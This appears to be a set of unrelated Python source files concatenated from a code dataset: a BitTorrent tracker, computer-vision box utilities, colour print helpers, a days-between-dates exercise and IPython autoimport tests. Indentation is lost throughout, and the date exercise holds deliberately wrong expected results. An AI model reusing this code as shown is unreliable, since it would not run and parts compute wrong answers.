rsize = self.response_size
if event == 'stopped':
if peer:
if auth:
self.delete_peer(infohash,myid)
elif not peer:
ts[myid] = clock()
peer = {'ip': ip, 'port': port, 'left': left}
if mykey:
peer['key'] = mykey
if gip:
peer['given ip'] = gip
if port:
if not self.natcheck or islocal:
peer['nat'] = 0
self.natcheckOK(infohash,myid,ip1,port,left)
else:
NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
else:
peer['nat'] = 2**30
if event == 'completed':
self.completed[infohash] += 1
if not left:
self.seedcount[infohash] += 1
peers[myid] = peer
else:
if not auth:
return rsize # return w/o changing stats
ts[myid] = clock()
if not left and peer['left']:
self.completed[infohash] += 1
self.seedcount[infohash] += 1
if not peer.get('nat', -1):
for bc in self.becache[infohash]:
bc[1][myid] = bc[0][myid]
del bc[0][myid]
elif left and not peer['left']:
self.completed[infohash] -= 1
self.seedcount[infohash] -= 1
if not peer.get('nat', -1):
for bc in self.becache[infohash]:
bc[0][myid] = bc[1][myid]
del bc[1][myid]
peer['left'] = left
if port:
recheck = False
if ip != peer['ip']:
peer['ip'] = ip
recheck = True
if gip != peer.get('given ip'):
if gip:
peer['given ip'] = gip
elif peer.has_key('given ip'):
del peer['given ip']
recheck = True
natted = peer.get('nat', -1)
if recheck:
if natted == 0:
l = self.becache[infohash]
y = not peer['left']
for x in l:
del x[y][myid]
if natted >= 0:
del peer['nat'] # restart NAT testing
if natted and natted < self.natcheck:
recheck = True
if recheck:
if not self.natcheck or islocal:
peer['nat'] = 0
self.natcheckOK(infohash,myid,ip1,port,left)
else:
NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
return rsize
def peerlist(self, infohash, stopped, tracker, is_seed, return_type, rsize):
data = {} # return data
seeds = self.seedcount[infohash]
data['complete'] = seeds
data['incomplete'] = len(self.downloads[infohash]) - seeds
if ( self.config['allowed_controls']
and self.allowed[infohash].has_key('warning message') ):
data['warning message'] = self.allowed[infohash]['warning message']
if tracker:
data['interval'] = self.config['multitracker_reannounce_interval']
if not rsize:
return data
cache = self.cached_t.setdefault(infohash, None)
if ( not cache or len(cache[1]) < rsize
or cache[0] + self.config['min_time_between_cache_refreshes'] < clock() ):
bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
cache = [ clock(), bc[0][0].values() + bc[0][1].values() ]
self.cached_t[infohash] = cache
shuffle(cache[1])
cache = cache[1]
data['peers'] = cache[-rsize:]
del cache[-rsize:]
return data
data['interval'] = self.reannounce_interval
if stopped or not rsize: # save some bandwidth
data['peers'] = []
return data
bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
len_l = len(bc[0][0])
len_s = len(bc[0][1])
if not (len_l+len_s): # caches are empty!
data['peers'] = []
return data
l_get_size = int(float(rsize)*(len_l)/(len_l+len_s))
cache = self.cached.setdefault(infohash,[None,None,None])[return_type]
if cache and ( not cache[1]
or (is_seed and len(cache[1]) < rsize)
or len(cache[1]) < l_get_size
or cache[0]+self.config['min_time_between_cache_refreshes'] < self.cachetime ):
cache = None
if not cache:
peers = self.downloads[infohash]
vv = [[],[],[]]
for key, ip, port in self.t2tlist.harvest(infohash): # empty if disabled
if not peers.has_key(key):
vv[0].append({'ip': ip, 'port': port, 'peer id': key})
vv[1].append({'ip': ip, 'port': port})
vv[2].append(compact_peer_info(ip, port))
cache = [ self.cachetime,
bc[return_type][0].values()+vv[return_type],
bc[return_type][1].values() ]
shuffle(cache[1])
shuffle(cache[2])
self.cached[infohash][return_type] = cache
for rr in xrange(len(self.cached[infohash])):
if rr != return_type:
try:
self.cached[infohash][rr][1].extend(vv[rr])
except:
pass
if len(cache[1]) < l_get_size:
peerdata = cache[1]
if not is_seed:
peerdata.extend(cache[2])
cache[1] = []
cache[2] = []
else:
if not is_seed:
peerdata = cache[2][l_get_size-rsize:]
del cache[2][l_get_size-rsize:]
rsize -= len(peerdata)
else:
peerdata = []
if rsize:
peerdata.extend(cache[1][-rsize:])
del cache[1][-rsize:]
if return_type == 2:
peerdata = ''.join(peerdata)
data['peers'] = peerdata
return data
def get(self, connection, path, headers):
real_ip = connection.get_ip()
ip = real_ip
if is_ipv4(ip):
ipv4 = True
else:
try:
ip = ipv6_to_ipv4(ip)
ipv4 = True
except ValueError:
ipv4 = False
if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip))
or (self.banned_IPs and self.banned_IPs.includes(ip)) ):
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
'your IP is not allowed on this tracker'}))
nip = get_forwarded_ip(headers)
if nip and not self.only_local_override_ip:
ip = nip
try:
ip = to_ipv4(ip)
ipv4 = True
except ValueError:
ipv4 = False
paramslist = {}
def params(key, default = None, l = paramslist):
if l.has_key(key):
return l[key][0]
return default
try:
(scheme, netloc, path, pars, query, fragment) = urlparse(path)
if self.uq_broken == 1:
path = path.replace('+',' ')
query = query.replace('+',' ')
path = unquote(path)[1:]
for s in query.split('&'):
if s:
i = s.index('=')
kw = unquote(s[:i])
paramslist.setdefault(kw, [])
paramslist[kw] += [unquote(s[i+1:])]
if path == '' or path == 'index.html':
return self.get_infopage()
if (path == 'file'):
return self.get_file(params('info_hash'))
if path == 'favicon.ico' and self.favicon is not None:
return (200, 'OK', {'Content-Type' : 'image/x-icon'}, self.favicon)
# automated access from here on
if path in ('scrape', 'scrape.php', 'tracker.php/scrape'):
return self.get_scrape(paramslist)
if not path in ('announce', 'announce.php', 'tracker.php/announce'):
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
# main tracker function
filtered = self.Filter.check(real_ip, paramslist, headers)
if filtered:
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason': filtered}))
infohash = params('info_hash')
if not infohash:
raise ValueError, 'no info hash'
notallowed = self.check_allowed(infohash, paramslist)
if notallowed:
return notallowed
event = params('event')
rsize = self.add_data(infohash, event, ip, paramslist)
except ValueError, e:
return (400, 'Bad Request', {'Content-Type': 'text/plain'},
'you sent me garbage - ' + str(e))
if self.aggregate_forward and not paramslist.has_key('tracker'):
self.aggregate_senddata(query)
if self.is_aggregator: # don't return peer data here
return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'response': 'OK'}))
if params('compact') and ipv4:
return_type = 2
elif params('no_peer_id'):
return_type = 1
else:
return_type = 0
data = self.peerlist(infohash, event=='stopped',
params('tracker'), not params('left'),
return_type, rsize)
if paramslist.has_key('scrape'): # deprecated
data['scrape'] = self.scrapedata(infohash, False)
if self.dedicated_seed_id:
if params('seed_id') == self.dedicated_seed_id and params('left') == 0:
self.is_seeded[infohash] = True
if params('check_seeded') and self.is_seeded.get(infohash):
data['seeded'] = 1
return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode(data))
def natcheckOK(self, infohash, peerid, ip, port, not_seed):
bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
bc[0][not not_seed][peerid] = Bencached(bencode({'ip': ip, 'port': port,
'peer id': peerid}))
bc[1][not not_seed][peerid] = Bencached(bencode({'ip': ip, 'port': port}))
bc[2][not not_seed][peerid] = compact_peer_info(ip, port)
def natchecklog(self, peerid, ip, port, result):
year, month, day, hour, minute, second, a, b, c = localtime(time())
print '%s - %s [%02d/%3s/%04d:%02d:%02d:%02d] "!natcheck-%s:%i" %i 0 - -' % (
ip, quote(peerid), day, months[month], year, hour, minute, second,
ip, port, result)
def connectback_result(self, result, downloadid, peerid, ip, port):
record = self.downloads.get(downloadid, {}).get(peerid)
if ( record is None
or (record['ip'] != ip and record.get('given ip') != ip)
or record['port'] != port ):
if self.config['log_nat_checks']:
self.natchecklog(peerid, ip, port, 404)
return
if self.config['log_nat_checks']:
if result:
x = 200
else:
x = 503
self.natchecklog(peerid, ip, port, x)
if not record.has_key('nat'):
record['nat'] = int(not result)
if result:
self.natcheckOK(downloadid,peerid,ip,port,record['left'])
elif result and record['nat']:
record['nat'] = 0
self.natcheckOK(downloadid,peerid,ip,port,record['left'])
elif not result:
record['nat'] += 1
def remove_from_state(self, *l):
for s in l:
try:
del self.state[s]
except:
pass
def save_state(self):
self.rawserver.add_task(self.save_state, self.save_dfile_interval)
h = open(self.dfile, 'wb')
h.write(bencode(self.state))
h.close()
def parse_allowed(self):
self.rawserver.add_task(self.parse_allowed, self.parse_dir_interval)
if self.config['allowed_dir']:
r = parsedir( self.config['allowed_dir'], self.allowed,
self.allowed_dir_files, self.allowed_dir_blocked,
[".torrent"] )
( self.allowed, self.allowed_dir_files, self.allowed_dir_blocked,
added, garbage2 ) = r
self.state['allowed'] = self.allowed
self.state['allowed_dir_files'] = self.allowed_dir_files
self.t2tlist.parse(self.allowed)
else:
f = self.config['allowed_list']
if self.allowed_list_mtime == os.path.getmtime(f):
return
try:
r = parsetorrentlist(f, self.allowed)
(self.allowed, added, garbage2) = r
self.state['allowed_list'] = self.allowed
except (IOError, OSError):
print '**warning** unable to read allowed torrent list'
return
self.allowed_list_mtime = os.path.getmtime(f)
for infohash in added.keys():
self.downloads.setdefault(infohash, {})
self.completed.setdefault(infohash, 0)
self.seedcount.setdefault(infohash, 0)
def read_ip_lists(self):
self.rawserver.add_task(self.read_ip_lists,self.parse_dir_interval)
f = self.config['allowed_ips']
if f and self.allowed_ip_mtime != os.path.getmtime(f):
self.allowed_IPs = IP_List()
try:
self.allowed_IPs.read_fieldlist(f)
self.allowed_ip_mtime = os.path.getmtime(f)
except (IOError, OSError):
print '**warning** unable to read allowed_IP list'
f = self.config['banned_ips']
if f and self.banned_ip_mtime != os.path.getmtime(f):
self.banned_IPs = IP_Range_List()
try:
self.banned_IPs.read_rangelist(f)
self.banned_ip_mtime = os.path.getmtime(f)
except (IOError, OSError):
print '**warning** unable to read banned_IP list'
def delete_peer(self, infohash, peerid):
dls = self.downloads[infohash]
peer = dls[peerid]
if not peer['left']:
self.seedcount[infohash] -= 1
if not peer.get('nat',-1):
l = self.becache[infohash]
y = not peer['left']
for x in l:
del x[y][peerid]
del self.times[infohash][peerid]
del dls[peerid]
def expire_downloaders(self):
for x in self.times.keys():
for myid, t in self.times[x].items():
if t < self.prevtime:
self.delete_peer(x,myid)
self.prevtime = clock()
if (self.keep_dead != 1):
for key, value in self.downloads.items():
if len(value) == 0 and (
self.allowed is None or not self.allowed.has_key(key) ):
del self.times[key]
del self.downloads[key]
del self.seedcount[key]
self.rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
def track(args):
if len(args) == 0:
print formatDefinitions(defaults, 80)
return
try:
config, files = parseargs(args, defaults, 0, 0)
except ValueError, e:
print 'error: ' + str(e)
print 'run with no arguments for parameter explanations'
return
r = RawServer(Event(), config['timeout_check_interval'],
config['socket_timeout'], ipv6_enable = config['ipv6_enabled'])
t = Tracker(config, r)
r.bind(config['port'], config['bind'],
reuse = True, ipv6_socket_style = config['ipv6_binds_v4'])
r.listen_forever(HTTPHandler(t.get, config['min_time_between_log_flushes']))
t.save_state()
print '# Shutting down: ' + isotime()
def size_format(s):
if (s < 1024):
r = str(s) + 'B'
elif (s < 1048576):
r = str(int(s/1024)) + 'KiB'
elif (s < 1073741824L):
r = str(int(s/1048576)) + 'MiB'
elif (s < 1099511627776L):
r = str(int((s/1073741824.0)*100.0)/100.0) + 'GiB'
else:
r = str(int((s/1099511627776.0)*100.0)/100.0) + 'TiB'
return(r)
|
"""
Some computer vision utility functions
"""
import base64, cv2, os, glob
import numpy as np
import math
def resize_pad_image(img, new_dims, pad_output=True):
old_height, old_width, ch = img.shape
old_ar = float(old_width) / float(old_height)
new_ar = float(new_dims[0]) / float(new_dims[1])
undistorted_scale_factor = [1.0, 1.0] # if you want to resize bounding boxes on a padded img you'll need this
if pad_output is True:
if new_ar > old_ar:
new_width = old_height * new_ar
padding = abs(new_width - old_width)
img = cv2.copyMakeBorder(img, 0, 0, 0, int(padding), cv2.BORDER_CONSTANT, None, [0, 0, 0])
undistorted_scale_factor = [float(old_width) / (float(new_dims[1]) * old_ar),
float(old_height) / float(new_dims[1])]
elif new_ar < old_ar:
new_height = old_width / new_ar
padding = abs(new_height - old_height)
img = cv2.copyMakeBorder(img, 0, int(padding), 0, 0, cv2.BORDER_CONSTANT, None, [0, 0, 0])
undistorted_scale_factor = [float(old_width) / float(new_dims[0]),
float(old_height) / (float(new_dims[0]) / old_ar)]
elif new_ar == old_ar:
scale_factor = float(old_width) / new_dims[0]
undistorted_scale_factor = [scale_factor, scale_factor]
outimg = cv2.resize(img, (new_dims[0], new_dims[1]))
return outimg, undistorted_scale_factor
def crop_img(bbox, im):
x1 = int(bbox[0])
y1 = int(bbox[1])
x2 = int(bbox[2])
y2 = int(bbox[3])
cropped_img = im[y1:y2, x1:x2]
return cropped_img
def compute_dist(vec1, vec2, mode='cosine'):
"""
compute the distance between two given vectors.
:param vec1: np.array vector
:param vec2: np.array vector
:param mode: cosine for cosine distance; l2 for l2 norm distance;
:return: distance of the input mode
"""
if mode == 'cosine':
dist = 1 - np.dot(vec1, vec2) / np.linalg.norm(vec1) / np.linalg.norm(vec2)
elif mode == 'l2':
dist = np.linalg.norm(vec1 - vec2)
else:
dist = None
return dist
def make_grids_of_images_from_folder(images_path, image_shape, grid_shape):
"""
makes grids of images in numpy array format from an image folder.
:param images_path: string, path to images folder
:param image_shape: tuple, size each image will be resized to for display
:param grid_shape: tuple, shape of image grid (rows,cols)
:return: list of grid images in numpy array format
example usage: grids = make_grids_of_images('/Pictures', (64,64),(5,5))
"""
# get all images from folder
img_path_glob = glob.iglob(os.path.join(images_path, '*'))
img_path_list = []
for ip in img_path_glob:
if ip.endswith('.jpg') or ip.endswith('.jpeg') or ip.endswith('.png'):
img_path_list.append(ip)
if len(img_path_list) < 1:
print 'No images found at {}'.format(images_path)
return None
image_grids = []
# start with black canvas to draw images to
grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
dtype=np.uint8)
cursor_pos = [0, 0]
for img_path in img_path_list:
img = cv2.imread(img_path)
if img is None:
print 'ERROR: reading {}. skipping.'.format(img_path)
continue
img = cv2.resize(img, image_shape)
# draw image to black canvas
grid_image[cursor_pos[1]:cursor_pos[1] + image_shape[1], cursor_pos[0]:cursor_pos[0] + image_shape[0]] = img
cursor_pos[0] += image_shape[0] # increment cursor x position
if cursor_pos[0] >= grid_shape[0] * image_shape[0]:
cursor_pos[1] += image_shape[1] # increment cursor y position
cursor_pos[0] = 0
if cursor_pos[1] >= grid_shape[1] * image_shape[1]:
cursor_pos = [0, 0]
# reset black canvas
grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
dtype=np.uint8)
image_grids.append(grid_image)
return image_grids
def make_grids_of_images_from_list(image_list, image_shape, grid_shape):
"""
makes grids of images in numpy array format from an image folder.
:param images_path: list, input images
:param image_shape: tuple, size each image will be resized to for display
:param grid_shape: tuple, shape of image grid (rows,cols)
:return: list of grid images in numpy array format
example usage: grids = make_grids_of_images('/Pictures', (64,64),(5,5))
"""
image_grids = []
# start with black canvas to draw images to
grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
dtype=np.uint8)
cursor_pos = [0, 0]
for img in image_list:
img = cv2.resize(img, image_shape)
# draw image to black canvas
grid_image[cursor_pos[1]:cursor_pos[1] + image_shape[1], cursor_pos[0]:cursor_pos[0] + image_shape[0]] = img
cursor_pos[0] += image_shape[0] # increment cursor x position
if cursor_pos[0] >= grid_shape[0] * image_shape[0]:
cursor_pos[1] += image_shape[1] # increment cursor y position
cursor_pos[0] = 0
if cursor_pos[1] >= grid_shape[1] * image_shape[1]:
cursor_pos = [0, 0]
# reset black canvas
grid_image = np.zeros(shape=(image_shape[1] * (grid_shape[1]), image_shape[0] * grid_shape[0], 3),
dtype=np.uint8)
image_grids.append(grid_image)
return image_grids
def bb_intersection_over_union(boxA, boxB):
# determine the (x, y)-coordinates of the intersection rectangle
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
# compute the area of intersection rectangle
interArea = (xB - xA + 1) * (yB - yA + 1)
# compute the area of both the prediction and ground-truth
# rectangles
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
# compute the intersection over union by taking the intersection
# area and dividing it by the sum of prediction + ground-truth
# areas - the interesection area
iou = interArea / float(boxAArea + boxBArea - interArea)
# return the intersection over union value
return iou
def centroid_from_bb(bb):
x1, y1, x2, y2 = bb
w = abs(x2 - x1)
h = abs(y2 - y1)
c_x = x1 + w / 2
c_y = y1 + h / 2
return np.array([c_x, c_y])
def dist_btwn_bb_centroids(bb1, bb2):
dx, dy = centroid_from_bb(bb1) - centroid_from_bb(bb2)
dist = math.sqrt(dx * dx + dy * dy)
return dist
def wid_ht_from_bb(bb):
wid = int(abs(bb[2] - bb[0]))
ht = int(abs(bb[3] - bb[1]))
return wid, ht
def check_tracks_equal(track1, track2):
t1_bb = track1.get_latest_bb()
t2_bb = track2.get_latest_bb()
dist = np.linalg.norm(t2_bb - t1_bb)
return dist < 50
def clamp_negative_nums(bb):
temp = []
for pnt in bb:
tmp = pnt
if tmp < 0:
tmp = 0
temp.append(tmp)
return temp
def bb_has_width_height(bb):
w = int(bb[2] - bb[0])
h = int(bb[3] - bb[1])
return True if (w > 1 and h > 1) else False
def bb_as_ints(bb):
return [int(bb[0]), int(bb[1]), int(bb[2]), int(bb[3])]
|
quiet = False
log = '7;37;40'
info = '7;32;40'
warn = '7;33;40'
error = '7;31;40'
state = '7;34;47'
class Settings:
quiet = False
def mprint(text: str, type: str):
if not Settings.quiet:
print(f'\x1b[{type}m {text} \x1b[0m')
def ctext(text : str, type : str)->str:
return f'\x1b[{type}m {text} \x1b[0m'
|
# TODO
def daysBetweenDates_(year1, month1, day1, year2, month2, day2):
# Coarse grain approach
"""
Calculates the number of days between two dates.
"""
# assert date2 greater than date1
# assert valid dates (ie no 31st June)
yeardays = (year2 - year1) * 365.25
monthdays = (month2 - month1) * 30.4
daydays = day2 - day1
return int(yeardays) + int(monthdays) + int(daydays)
def testDaysBetweenDates():
# test same day
assert daysBetweenDates_(2017, 12, 30, 2017, 12, 30) == 0
# test adjacent days
assert daysBetweenDates_(2017, 12, 30, 2017, 12, 31) == 1
# test new year
assert daysBetweenDates_(2017, 12, 30, 2018, 1, 1) == 2
# test full year difference
assert daysBetweenDates_(2012, 6, 29, 2013, 6, 29) == 365
print("Congratulations! Your daysBetweenDates")
print("function is working correctly!")
testDaysBetweenDates()
####################################################################
def isLeapYear(year):
if year % 400 == 0:
return True
elif year % 100 == 0:
return False
elif year % 4 == 0:
return True
else:
return False
def daysInMonth(year, month):
if month in (1, 3, 5, 7, 8, 10, 12):
return 31
elif month in (4, 6, 9, 11):
return 30
elif isLeapYear(year) and month == 2:
return 29
elif not isLeapYear(year) and month == 2:
return 28
# Using a helper functions
def nextDay(year, month, day):
"""Simple version: assume every month has 30 days"""
if day < daysInMonth(year, month):
return year, month, day + 1
else:
if month == 12:
return year + 1, 1, 1
else:
return year, month + 1, 1
def daysBetweenDates__(year1, month1, day1, year2, month2, day2):
"""Returns the number of days between year1/month1/day1
and year2/month2/day2. Assumes inputs are valid dates
in Gregorian calendar, and the first date is not after
the second."""
days = 0
mydate = (year1, month1, day1)
while mydate != (year2, month2, day2):
mydate = nextDay(*mydate)
days += 1
return days
def test():
test_cases = [
((2012, 9, 30, 2012, 10, 30), 30),
((2012, 1, 1, 2013, 1, 1), 360),
((2012, 9, 1, 2012, 9, 4), 3),
]
for (args, answer) in test_cases:
result = daysBetweenDates__(*args)
if result != answer:
print(f"Test with data:", {args}, "failed")
else:
print("Test case passed!")
test()
def dateIsBefore(year1, month1, day1, year2, month2, day2):
"""Returns True if year1-month1-day1 is before year2-month2-day2. Otherwise, returns False."""
if year1 < year2:
return True
if year1 == year2:
if month1 < month2:
return True
if month1 == month2:
return day1 < day2
return False
def daysBetweenDates(year1, month1, day1, year2, month2, day2):
"""Returns the number of days between year1/month1/day1
and year2/month2/day2. Assumes inputs are valid dates
in Gregorian calendar."""
# program defensively! # using helper function as assertion
assert not dateIsBefore(year2, month2, day2, year1, month1, day1)
days = 0
if year1 % 4 == 0:
"do something because it's a leap year"
while dateIsBefore(year1, month1, day1, year2, month2, day2):
year1, month1, day1 = nextDay(year1, month1, day1)
days += 1
return days
def test():
test_cases = [
((2012, 1, 1, 2012, 2, 28), 58),
((2012, 1, 1, 2012, 3, 1), 60),
((2011, 6, 30, 2012, 6, 30), 366),
((2011, 1, 1, 2012, 8, 8), 585),
((1900, 1, 1, 1999, 12, 31), 36523),
]
for (args, answer) in test_cases:
result = daysBetweenDates(*args)
if result != answer:
print(f"Test with data:", {args}, "failed")
else:
print("Test case passed!")
test()
|
from pathlib import Path
import IPython.utils.io
import IPython.testing.globalipapp
import pytest
@pytest.fixture(scope="module")
def global_ip():
ip = IPython.testing.globalipapp.start_ipython()
path = Path(__file__)
ip.run_cell("import sys; sys.path[:0] = [{!r}, {!r}]".format(
str(path.parents[1]), str(path.parents[0])))
return ip
@pytest.fixture
def ip(global_ip):
global_ip.run_cell("%reset -f")
global_ip.run_cell("%load_ext ipython_autoimport")
yield global_ip
with IPython.utils.io.capture_output():
global_ip.run_cell(
"for name, mod in list(sys.modules.items()):\n"
" if getattr(mod, '__file__', '').startswith({!r}):\n"
" del sys.modules[name]"
.format(str(Path(__file__).parent)))
global_ip.run_cell("%unload_ext ipython_autoimport")
@pytest.mark.parametrize("name", ["a", "a.b", "a.b.c"])
def test_autoimport(ip, name):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("{}.__name__".format(name))
parts = name.split(".")
assert (captured.stdout
== "{}Out[1]: {!r}\n".format(
"".join("Autoimport: import {}\n".format(
".".join(parts[:i + 1])) for i in range(len(parts))),
name))
def test_sub_submodule(ip):
ip.run_cell("import a.b")
with IPython.utils.io.capture_output() as captured:
ip.run_cell("a.b.c.__name__")
assert captured.stdout == "Autoimport: import a.b.c\nOut[1]: 'a.b.c'\n"
def test_no_import(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("a.not_here")
# Exact message changes between Python versions.
assert "has no attribute 'not_here'" in captured.stdout.splitlines()[-1]
assert "ImportError" not in captured.stdout
def test_setattr(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("a; a.b = 42; 'b' in vars(a), a.b")
assert captured.stdout == "Autoimport: import a\nOut[1]: (True, 42)\n"
def test_closure(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("x = 1; (lambda: x)()")
assert captured.stdout == "Out[1]: 1\n"
def test_del(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("x = 1; del x; print('ok')")
assert captured.stdout == "ok\n"
def test_list(ip):
ip.run_cell("os")
with IPython.utils.io.capture_output() as captured:
ip.run_cell("%autoimport -l")
assert (captured.stdout ==
"Autoimport: the following autoimports were run:\nimport os\n")
def test_no_list(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("%autoimport -l")
assert (captured.stdout ==
"Autoimport: no autoimports in this session yet.\n")
def test_noclear(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("%autoimport -c ipython_autoimport_test_noclear")
assert (
captured.stdout ==
"Autoimport: didn't find symbol "
"'ipython_autoimport_test_noclear' in autoimport cache.\n"
)
@pytest.mark.parametrize("magic", ["time", "timeit -n 1 -r 1", "prun"])
def test_magics(ip, magic):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("{} x = 1".format(magic))
assert "error" not in captured.stdout.lower()
def test_no_autoimport_in_time(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("%time type(get_ipython().user_ns)")
assert "autoimport" not in captured.stdout.lower()
def test_unload(ip):
with IPython.utils.io.capture_output() as captured:
ip.run_cell("%unload_ext ipython_autoimport")
ip.run_cell("try: a\nexcept NameError: print('ok')")
assert captured.stdout == "ok\n"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.